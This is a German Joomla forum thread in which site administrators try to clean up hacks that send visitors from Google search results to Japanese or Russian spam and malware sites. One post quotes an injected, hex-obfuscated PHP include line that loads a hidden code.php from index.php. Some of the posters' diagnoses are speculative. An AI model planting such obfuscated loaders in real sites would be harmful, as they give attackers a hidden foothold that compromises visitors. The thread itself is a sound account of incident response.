hack? links nach google-recherche leiten auf jahoo-japan weiter

  • hallo miteinander,


    eine von mir betreute website wurde vor 10 tagen gehackt, sie lief zu diesem zeitpunkt in der joomla version 3.6.2, die zu diesem zeitpunkt die aktuelle version war. diesen hack habe ich beseitigt (letztes backup neu installiert) und dann auf joomla 3.6.3 upgedated. jetzt gibt es ein neues problem, das mir so noch nicht begegnet ist. die website wird unter ihrer domain normal angezeigt. wenn man jedoch bei google nach diesem angebot sucht und sie als suchergebnis angezeigt wird und die entsprechenden links anklickt, wird man auf eine japanische website - jahoo - weitergeleitet.
    ist das ein hack?
    was ist zu tun?
    ich bin sehr dankbar über hilfreiche tipps
    grüße
    cardamon

  • Hallo cardamon,


    durch ein Update beseitigst du keinen Hack.
    Du musst die Schaddateien finden und löschen.
    Allerdings musst du schon Profi sein, um das zu bereinigen.
    Ausserdem musst du deinen PC untersuchen, ob da nicht auch
    schon Backdoors vorhanden sind (FTP).


    Des Weiteren würde ich die Seite professionell bereinigen lassen oder
    den kompletten Webspace und die DB löschen und ein sauberes Backup
    einspielen oder die Seite neu aufsetzen.


    Beim Hack verfahre bitte hiernach:


    https://www.fc-hosting.de/joomla/tips-joomla-gehackt.php

  • Hallo


    Es gab da mal Hacks die eine "Weiche" in die index.php des jeweiligen Systems geschrieben haben. Da wurden dann Besucher von Suchmaschinen - und nur von diesen - auf andere Seiten im Ausland umgeleitet. Bemerkt man im ersten Moment auch nicht, da man sich selbst ja eher selten bei Google und Co. anklickt. Ich meine mich aber zu erinnern, etwas Ähnliches auch schon mal in der .htaccess gefunden zu haben. Wenn Du den Hack auf Deiner Seite bereinigst, also bitte auch diese versteckte Datei berücksichtigen. Du kannst in deinem FTP-Programm in den Optionen auswählen das versteckte Dateien angezeigt werden sollen.


    Gruß Jan

  • Hallo,


    habe mich hier im Forum angemeldet, in der Hoffnung einige Hinweise zu bekommen. Ich betreue eine Business-Seite, wo Links nach Google-Suche ebenfalls weitergeleitet werden. Es gibt dazu massive Hinweise von Usern und Kunden. Ich selbst habe das erst festgestellt, nachdem ich den Test mit bereinigten Browsern vorgenommen habe. Dabei erfolgt die Umleitung einmal auf eine RU-Seite mit Malware (win.mobile.installs.com) und zweitens auf eine RU-Pornoseite. Den letzteren Link erspare ich mir. Zur Sicherheit von User und Kunden habe ich das gesamte System offline genommen und ein klassische HTML-Seite vorgeschaltet. Gibt es außer den bereits geschilderten Ansätzen weitere Hinweise? Joomla selbst sagt mir, dass die aktuelle Version installiert ist. Allerdings sind noch 2 Drittanbieter-Module offen (ARI und Gästebuch).


    Danke und Gruß
    Wolfgang

  • Hallo Wolfgang,


    Was ist denn die angezeigte "aktuelle Version"? Hast du einmal die index.php geprüft bzw. mit einer sauberen Version verglichen?
    Da du nicht der einzige bist mit dem Problem, gibt es hierzu auch einige Anleitungen im Netz.


    Folgende Suchwörter führen "joomla google suche umleitung fremde webseite" bringen einige Ergebnisse. Link


    Gruß Frank

  • Hallo Frank,


    danke für die Anteilnahme :) und den Link. Die aktuelle Version ist 3.6... wenn ich nicht irre. Kann konkret ja nicht nachsehen, da ich nur FTP Zugriff habe. Bin dabei die Dateien zu vergleichen. Normal beginnt die index.php ja mit:
    "/**
    * @package Joomla.Site
    *
    * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
    * @license GNU General Public License version 2 or later; see LICENSE.txt
    */"
    Darüber finde ich nun eine neu Zeile:
    "include "\x2fhom\x65/st\x72ato\x2fhtt\x70/pr\x65miu\x6d/ri\x64/24\x2f89/\x35371\x32489\x2fhtd\x6fcs/\x6cibr\x61rie\x73/fo\x66/da\x74aba\x73e/c\x6fde.\x70hp";"


    Damit kann ich echt nix anfangen! Oder gibt es eine Erweiterung, die mir entgangen ist?


    Gruß
    Wolfgang

  • Hallo Frank,


    danke für die "Lösungsvorschläge"! :)
    Aber ein Problem einfach aus der Hand zu geben, nur weil die Lösung nicht gleich in Sichtweite ist, war noch nie mein Ding. Ich bin sicher, dass ich das löse. Im Notfall bleibt dein erster Vorschlag. Der läuft ja nicht weg! Erst einmal sind alle Zugangsdaten geändert. zweitens, versuche ich noch ein saubere Backup zu bekommen. Ich denke, das Tor ist im ARI - Systemmanager. Ich melde mich, wenn ich die Schwachstellen identifiziert habe. Das sollte mein Kopf noch hergeben ;)


    Gruß
    Wolfgang

  • Möglichkeiten Schadcode zu verstecken gibt es leider viele. So lange Du die ursprüngliche Sicherheitslücke nicht gefunden hast, und definitiv alle Veränderungen nachvollziehen und Rückgängig machen konntest, ist die Geschichte quasi ein Fass ohne Boden. Wichtig ist halt, dass Du erkennen kannst was potenzieller Schadcode ist, welche Dateien etwas in dem jeweiligen Verzeichnissen zu suchen haben, also "echt" sind, sowie die Kenntnis wie man Logdateien liest und was die einzelnen Einträge zu bedeuten haben. Eine feste Anleitung / HowTo oder Liste die man einfach abarbeitet gibt es nicht. Auch wenn die Hacks meisten automatisiert vorgenommen werden, fügen die Personen die diese gehackten Seiten dann als Pakete kaufen, den Schadcode nach ihrem eigenen Geschmack und konkreten Anforderungen ein. Bei manchen ist es eine Mailer, bei anderen eine Phishing-Site, und wieder andere machen halt das Spiel mit den Weiterleitungen.


    Gruß Jan

  • E R F O L G !!! :)


    Danke Euch für die rege Anteilnahme und Hinweise. Ganz klar ist mir noch nicht, wie der Zugriff auf die Seite erfolgen konnte. Offensichtlich aber geschehen, als die ältere Version noch installiert war. Meine Vermutung geht in Richtung Joomla-Cache. Wie bereits geschrieben, wurde ständig eine money.php nach Aufruf der index.php über einen entsprechenden Eintrag kreiert. Die Quelle war die wp-sys.manager.php im ARI Images-Slider-Verzeichnis. Diese schaltete eine 404.money.php in das Startverzeichnis und leitete dann um. Gleichlautende Sites konnten noch im Template-Verzeichnis festgestellt werde. Die Seite läuft wieder schnell und stabil. Link sende ich gern. Aber ich denke, dass ist hier nicht erwünscht.


    Neu sitzt jetzt die 3.4.8 auf dem Server. Laut Joomla ist das die aktuelle Version obwohl ja eigentlich die 3.6.4 raus ist. Verstehe ich nicht ganz. Sollte ich noch aktualisieren? Wie ich aber gelesen habe, gibt es Probleme beim Einspielen des Updates.


    Danke und Gruß
    Wolfgang

  • Nochmals in der Sache...


    Leider zu früh gejubelt. Die Seite lief nur kurz ohne Probleme. Danach war der alte Schad behaftete Zustand wieder da. Alle Backups (STRATO) nützen nichts, da offensichtlich der Hack schon lange implementiert ist. Man sucht sich ja nicht selbst bei Google und so blieb die Sache bis zum Zeitpunkt der Kundeninformationen im Verborgenen.
    Nachdem ich mich etwas intensiver damit beschäftigt habe, bin ich sicher, dass es sich nur um einen klassischen Fall von „SQL-Injection“ handeln kann. Als Einfallstor kommen eigentlich aus meiner Sicht nur folgende Faktoren in Betracht:


    1. Lücken in Joomla selbst

    • URL-Parameter
    • Cookiewerte

    2. Verspätet Updateinstallation, zum Schließen der Lücke (leider versuchen Kunden oft einen Wartungsvertrag der Seite auszuschließen)
    3. Dritt-Module, die hier im speziellen Fall wären:

    • ARI-Imagesslider (Banner)
    • BreezingsForms (Formulareditor)
    • Easybook Reloadet (Gästebuch)

    Aufgrund des Musters des Angriffes, kann sicher der ARI Imagesslider ausgeschlossen werden. Durch die hexadezimale Codierung des Schadcodes schließe ich darauf, dass es sich nur um eine persistente oder nicht persistente „SQL-Injection“ handelt. Ich vermute deshalb Lücken in BreezingForms oder Easybook Reloadet. Entweder war es möglich den Schadcode direkt anstatt des Gästebucheintrages in der Datenbank durch eine XSS-Lücke zu speichern (persistente Injection) oder mit dem Formular wurde Schadcode an mich und einen zweiten User mit höheren Rechten gesendet. Allerdings hätte wir dann noch eine speziell präparierte Website besuchen müssen.


    Meine Fragen sind deshalb:


    1. Welche von den Joomlaentwicklern geprüften Alternativen gibt es zu den 3 genannten Modulen.
    2. Erfolgt generell eine Prüfung von Drittanbieter-Modulen, die hier im Forum empfohlen werden?
    3. Ist es möglich, die Datenbank zumindest in Teilen noch zu verwenden und wer würde das zu welchem Preis ausfiltern (Einträge Gästebuch mit Leistungsbewertung)
    4. Macht es Sinn, SSEQ_lib unter Joomla für eine zusätzliche Prüfung aufzusetzen (kenne das von xtc_modified)


    Für Eure Mithilfe wäre ich sehr Dankbar.


    Gruß
    Wolfgang

  • Wie soll denn Schadcode aus der DB in eine Datei gelangen?! Du kennst nun das Datum des Hacks, einfach mal die Zugriffslogdateien analysieren. Ich habe mit sehr vielen Webseiten zu tun, bisher ist mir bei noch keiner aufgefallen, dass die von dir genannten Erweiterungen unsicher wären. Es ist auch nicht selten, dass Installationen mehrfach gehackt werden, und wenn eine Installation nicht bereinigt wurde, wird der Code über längere Zeit einfach mitgeschliffen. Die Scanner der Hoster sind oft nicht auf dem aktuellen Stand, und wenn dieser dann mal mit neuen Phrasen gefüttert wird, kann es durchaus passieren, dass plötzlich dort die Alarmglocken angehen, obwohl der Code schon lange vorhanden war. Es kommt auch vor, dass es länger dauert, bis die präparierte Installation von Hackern missbraucht wird, es gibt einen regen Markt für kompromittierte Webapps wie Joomla, die werden dann "im Dutzend" an zwielichte Interessenten verkauft. Ich wette, die Installation war schon länger gehackt, und ist nie ordentlich bereinigt worden.

  • Zitat

    1. Welche von den Joomlaentwicklern geprüften Alternativen gibt es zu den 3 genannten Modulen.


    Joomla Entwickler prüfen keine Erweiterungen. Es gibt aber eine Liste von unsicheren Erweiterungen https://vel.joomla.org/live-vel

    Zitat

    2. Erfolgt generell eine Prüfung von Drittanbieter-Modulen, die hier im Forum empfohlen werden?


    Nein. Dies ist ein öffentliches Forum. Jeder kann hier posten was er will, solange es nicht gegen Forenreglen verstößt.

  • Hallo Chris,


    ich meine schon rein beim Betrachten der Seite wird der Schadcode ausgeführt und an den Browser des Betrachters übermittelt, wenn er einmal in der Datenbank abgespeichert ist. Wie er in die index.php kommt tappe ich selbst noch im dunkeln. Ich gehe davon aus, dass ein js.Script nachinstalliert worden ist. Wenn er die Rechte erlangt hat, ist das doch kein Problem. Jedenfalls wird der oben genannte Eintrag auch nach dem Löschen wieder in die Datei geschrieben. Bin da auch nicht so ein Experte und arbeite mich Schritt für Schritt vor. Parallel habe ich ein sauberes 3.6.4 mit zwei Faktoren Authentifizierung aufgesetzt. Alles weitere geschieht hier local. Obwohl ich beispielsweise zum Test die Dateien 404money.php und Money.php gelöscht hatte, zeigen die log. Dateien des Servers (Provider) das verschieden Befehle ausgeführt werden (mkdir, creat etc.) und die Dateien werden wieder angelegt, ohne dass ich auf die Seite zugreife. Ich kann deine Annahme aber bestätigen, das der Hack schon eine Weile zurückliegt. Eine Bereinigung wurde auch nicht vorgenommen, sondern erst nach Providermail Anfang 2016 ein Update vorgenommen. Das dies über eine kompromittierte Installation erfolgt ist, davon hatte ich natürlich keine Ahnung. Einen verdächtigen Eintrag habe ich heute in der SQL-DB in 2014 gefunden. Dem gehen wir gerade nach. Wie meinst du das, mit ....mitgeschliffen? . Das Ganze ist mir jedenfalls noch nie untergekommen, obwohl ich schon paar Jahre auf dem Buckel habe.
    Sag, gehört TinyURL eigentlich zur Standardinstallation von Joomla?


    Gruß
    Wolfgang

  • ... 404money.php und Money.php ...


    Ich gehe einfach momentan mal davon aus, dass das nicht die einzigen Dateien mit Schadcode waren. Es mögen noch woanders welche liegen oder joomlaeigene Dateien manipuliert worden sein, die (auch) als Backdoor genutzt werden können.
    Kurz und bündig: https://www.fc-hosting.de/joomla/tips-joomla-gehackt.php

    ------------------------------------------------------------
    Gruß vom Jörg
    (Lehrer ist kein Beruf sondern eine Diagnose. oops )